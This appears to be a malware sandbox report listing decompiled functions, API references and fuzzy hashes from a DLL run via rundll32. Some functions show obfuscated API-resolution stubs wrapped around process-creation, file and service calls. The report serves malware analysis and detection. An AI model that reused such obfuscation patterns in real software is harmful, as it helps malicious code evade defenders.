Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c8e5d362ea8495ed27514b8f8baf0cd57b7e06fc4690afc6db75ee4dc2175301
Instruction ID: 2a755c13c050d183703ed98df87f73a555c2f74e7236858a3b8186707cbcc6ed
Opcode Fuzzy Hash: c8e5d362ea8495ed27514b8f8baf0cd57b7e06fc4690afc6db75ee4dc2175301
Instruction Fuzzy Hash: 6911E671A046625BF720DB28BD85B0533E8D742374F99072AF629DB2D1EA70DC828384

Uniqueness

Uniqueness Score: -1.00%

Function 100024F7, Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100024F7(intOrPtr* _a4, long _a8) {
				int _t34;
				intOrPtr* _t36;
				signed int _t44;
				void* _t45;
				void** _t46;
				unsigned int _t49;
				signed int _t51;
				long _t52;

				_t46 = _a8;
				_t52 = _t46[2];
				if(_t52 == 0) {
					L7:
					return 1;
				}
				_t49 = _t46[3];
				if((_t49 & 0x02000000) == 0) {
					_t44 =  *(0x1004d02c + ((_t49 >> 0x1f) + ((_t49 >> 0x0000001e & 0x00000001) + (_t49 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
					_t33 =  ==  ? _t44 : _t44 | 0x00000200;
					_t34 = VirtualProtect( *_t46, _t52,  ==  ? _t44 : _t44 | 0x00000200,  &_a8); // executed
					if(_t34 != 0) {
						goto L7;
					}
					return _t34;
				}
				_t45 =  *_t46;
				if(_t45 != _t46[1]) {
					goto L7;
				}
				if(_t46[4] != 0) {
					L6:
					VirtualFree(_t45, _t52, 0x4000); // executed
					goto L7;
				}
				_t36 = _a4;
				_t51 =  *(_t36 + 0x30);
				if( *((intOrPtr*)( *_t36 + 0x38)) == _t51 || _t52 % _t51 == 0) {
					goto L6;
				} else {
					goto L7;
				}
			}

0x100024fa
0x100024ff
0x10002504
0x10002542
0x00000000
0x10002544
0x10002506
0x1000250f
0x10002566
0x1000257e
0x10002585
0x1000258d
0x00000000
0x00000000
0x00000000
0x1000258d
0x10002511
0x10002516
0x00000000
0x00000000
0x1000251c
0x10002535
0x1000253c
0x00000000
0x1000253c
0x1000251e
0x10002521
0x10002529
0x00000000
0x00000000
0x00000000
0x00000000

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,00000000,?,100026AE,?,?,?,00000018,00000000,00000000,?), ref: 1000253C
VirtualProtect.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,100026AE,?,?,?,00000018,00000000,00000000,?), ref: 10002585

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: 1386b0ded374da49f1cd6f70c6048c5dd5653c1bca3ca1c7d211eb0841789e4e
Instruction ID: e51ceea41273e8a754766f9e864be966224bb85f234d35eeffc3d3ca3a938713
Opcode Fuzzy Hash: 1386b0ded374da49f1cd6f70c6048c5dd5653c1bca3ca1c7d211eb0841789e4e
Instruction Fuzzy Hash: 8211E032B009158FE304DE09CCA0F16B7AAFF957A1F868158E806CB265DB30ED80CA84

Uniqueness

Uniqueness Score: -1.00%

Function 1001108A, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001108A(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x1004e384 == 0) {
					_push(_t13);
					E100282F8(__ebx); // executed
					_t2 = E10028D2F(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E100111A8(__ebx, _t17);
						if(_t3 != 0) {
							 *0x1004e390 = _t3;
							_t14 = 0;
							 *0x1004e384 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E100268B3(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E100268B3(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x10011091
0x10011097
0x10011098
0x1001109d
0x100110a2
0x100110a6
0x100110ae
0x100110b6
0x100110bd
0x100110c2
0x100110c4
0x100110b8
0x100110b8
0x100110b8
0x100110cb
0x100110a8
0x100110a8
0x100110a8
0x100110d2
0x100110dc
0x10011093
0x10011095
0x10011095

APIs

_free.LIBCMT ref: 100110D2

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 136e8264bd6b277982498fb8982027de4c9d58594c2cae3cb06861e7f2875850
Instruction ID: 0111380563e3a9ff58851abe999957ead0dd13a3de9bd6ab037c1be5c9088953
Opcode Fuzzy Hash: 136e8264bd6b277982498fb8982027de4c9d58594c2cae3cb06861e7f2875850
Instruction Fuzzy Hash: 89E0E53AD0A5B142F327D77A7D0129E16C5DB86376F110326F820CF1D1DFB089C15596

Uniqueness

Uniqueness Score: -1.00%

Function 00274F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00274F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002707A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00274f80
0x00274f81
0x00274f82
0x00274f86
0x00274f87
0x00274f8c
0x00274fa5
0x00274fa8
0x00274faf
0x00274fb6
0x00274fc7
0x00274fca
0x00274fd7
0x00274fe2
0x00274fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00274FE2

Strings

{#lm, xrefs: 00274FC2

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 64b9e80ab57b8190464cfe717bd6af648b65d509132e68873cebd42aa26b7e96
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 80F037B081120CFFDB08DFA4D98689EBFBAEB40300F208199E808AB250D3715B549B54

Uniqueness

Uniqueness Score: -1.00%

Function 10005B14, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10005B14(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E1000D81C(__ecx, __eflags, E100059EB); // executed
				 *0x1004d060 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E1000D8CD(_t7, __eflags, _t1, 0x1004dfb4);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E10005B47(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x10005b19
0x10005b1e
0x10005b23
0x10005b27
0x10005b32
0x10005b38
0x10005b39
0x10005b3b
0x10005b46
0x10005b3d
0x10005b3d
0x00000000
0x10005b3d
0x10005b29
0x10005b29
0x10005b2b
0x10005b2b

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10005B32
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10005B3D

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 17f7976ac9e9d55e73ccc180a4db989e266e98219e045f9a63b873bfabc5d0aa
Instruction ID: 5cd2f35f43c97ca4945b5701e3fc13db3cba3f53332ee10a1f45c835a382b29d
Opcode Fuzzy Hash: 17f7976ac9e9d55e73ccc180a4db989e266e98219e045f9a63b873bfabc5d0aa
Instruction Fuzzy Hash: D5D0C979508242987924F6B56D02A8F7384DB021F6B616267E620CA0CAEF23B4466A35

Uniqueness

Uniqueness Score: -1.00%

Function 0027976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0027976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0026602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002707A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00279772
0x00279773
0x00279778
0x0027977a
0x0027977b
0x0027977e
0x0027977f
0x00279782
0x00279785
0x00279788
0x00279789
0x0027978c
0x0027978f
0x00279790
0x00279791
0x00279794
0x00279797
0x0027979a
0x0027979d
0x002797a0
0x002797a3
0x002797a6
0x002797a7
0x002797a8
0x002797ad
0x002797b7
0x002797c3
0x002797ca
0x002797d1
0x002797d8
0x002797df
0x002797e3
0x002797fc
0x00279816
0x0027981d

APIs

CreateProcessW.KERNEL32(0026591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0026591A), ref: 00279816

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 2eb6e950e08b54ec22570880898c2c29c86647912668cb224e3a70f5a3ecf71b
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 6B11B372911148FBDF199F96DC4ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10029D17, Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10029D17(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x1004e598 + _a4 * 4;
				_t28 =  *0x1004d054; // 0xda1f8931
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E10029C50(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x1004d054;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E10011E30(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}

0x10029d21
0x10029d2b
0x10029d31
0x10029d36
0x10029d38
0x10029d3b
0x10029d3f
0x10029d47
0x10029d54
0x10029d5d
0x10029d7c
0x10029d81
0x10029d89
0x10029d91
0x10029d93
0x10029d95
0x00000000
0x10029d95
0x10029d69
0x10029d6d
0x00000000
0x00000000
0x10029d76
0x10029d78
0x00000000
0x10029d78
0x00000000
0x10029d49
0x00000000

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4028b3ffdbf220f5ccbab449946e7a0f9cd60c0eee147c0f303152eafb118c99
Instruction ID: 2a7355f5bd8dfc1c477535d0dfa17a080f77eb11a6ba006502a217067f0a1b70
Opcode Fuzzy Hash: 4028b3ffdbf220f5ccbab449946e7a0f9cd60c0eee147c0f303152eafb118c99
Instruction Fuzzy Hash: 2F01B537700621AFFB15DE69ED80A8A37D6EB862E07A14121FE04DB155DA30D801E754

Uniqueness

Uniqueness Score: -1.00%

Function 0026B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0026B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0026602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002707A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0026b569
0x0026b56a
0x0026b56d
0x0026b572
0x0026b574
0x0026b577
0x0026b57a
0x0026b57d
0x0026b580
0x0026b583
0x0026b586
0x0026b587
0x0026b58a
0x0026b58d
0x0026b590
0x0026b593
0x0026b594
0x0026b595
0x0026b59a
0x0026b5a4
0x0026b5b8
0x0026b5c0
0x0026b5c4
0x0026b5cb
0x0026b5d2
0x0026b5d9
0x0026b5e6
0x0026b5fd
0x0026b604

APIs

CreateFileW.KERNELBASE(00270668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00270668,?,?,?,?), ref: 0026B5FD

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 0327fafa4b4c3a5ec02fc6d5cb4461bd8a6135eb87ede52e0eb147eb3951bf6b
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 4511B272801248BBDF16DF95DD46CEE7F7AFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 10031EE4, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10031EE4(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E10026850(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E1002A310(__eflags, _t4, 0xfa0, 0); // executed
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E100268B3(0);
				return _t35;
			}

0x10031eea
0x10031ef1
0x10031ef6
0x10031efa
0x10031f01
0x10031f07
0x10031f07
0x10031f0d
0x10031f0f
0x10031f12
0x10031f12
0x10031f15
0x10031f17
0x10031f1d
0x10031f21
0x10031f26
0x10031f2a
0x10031f2e
0x10031f30
0x10031f33
0x10031f39
0x10031f40
0x10031f44
0x10031f47
0x10031f4a
0x10031f4a
0x10031f4e
0x10031f51
0x10031f03
0x10031f03
0x10031f03
0x10031f53
0x10031f5e

APIs

Part of subcall function 10026850: RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,10024158,00000001,00000364,FFFFFFFF,000000FF), ref: 10026891

_free.LIBCMT ref: 10031F53

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: b71b12b2ef210f463b7843e26c027f50fdbc803602e45414ae83a0b50f81752a
Instruction ID: 5ecf24b48f6bf668a87eb7aba8164494cce5243ea809713a93c3c489f3a86baa
Opcode Fuzzy Hash: b71b12b2ef210f463b7843e26c027f50fdbc803602e45414ae83a0b50f81752a
Instruction Fuzzy Hash: F8012B72604356AFC321CF64D8819C9FBA8EB093B0F550739E559A76C0D770AC10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0027981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0027981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0026602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002707A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00279821
0x00279822
0x00279825
0x00279828
0x0027982a
0x0027982c
0x0027982f
0x00279832
0x00279835
0x00279836
0x00279837
0x0027983c
0x00279855
0x00279858
0x0027985f
0x00279866
0x0027986d
0x00279874
0x0027987b
0x0027988e
0x0027989b
0x002798a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002687F2,0000CAAE,0000510C,AD82F196), ref: 0027989B

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 5ff70694106fec75d80ebbbb1fc180c58c74414d7dc3a8793abe3622122be630
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 4F015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00277BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00277BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002707A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00277bf7
0x00277bf8
0x00277bfa
0x00277bfd
0x00277bff
0x00277c02
0x00277c06
0x00277c07
0x00277c0f
0x00277c1d
0x00277c25
0x00277c2d
0x00277c31
0x00277c38
0x00277c3f
0x00277c46
0x00277c4a
0x00277c5e
0x00277c67
0x00277c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00277C67

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 15bede7b27f3bd786a82ece23fb7067232dc6edd6d3e6f87bcb0e367fa32a5e8
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: B8014FB190120CFFEB09DF94CC4A8DEBBB9EF44314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0026F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0026F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002707A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0026f662
0x0026f663
0x0026f665
0x0026f668
0x0026f66a
0x0026f66d
0x0026f670
0x0026f673
0x0026f677
0x0026f678
0x0026f67d
0x0026f687
0x0026f693
0x0026f69a
0x0026f6a1
0x0026f6a5
0x0026f6a9
0x0026f6b0
0x0026f6c9
0x0026f6d8
0x0026f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0026F6D8

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 1418f5eaa3fe879dfa5cd0ed18178fc83abf0b6380ca8bfaeba733e2abfab5c9
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 1B01E5B6901208BBEF059F94DC4A8DF7F79EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10026850, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10026850(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
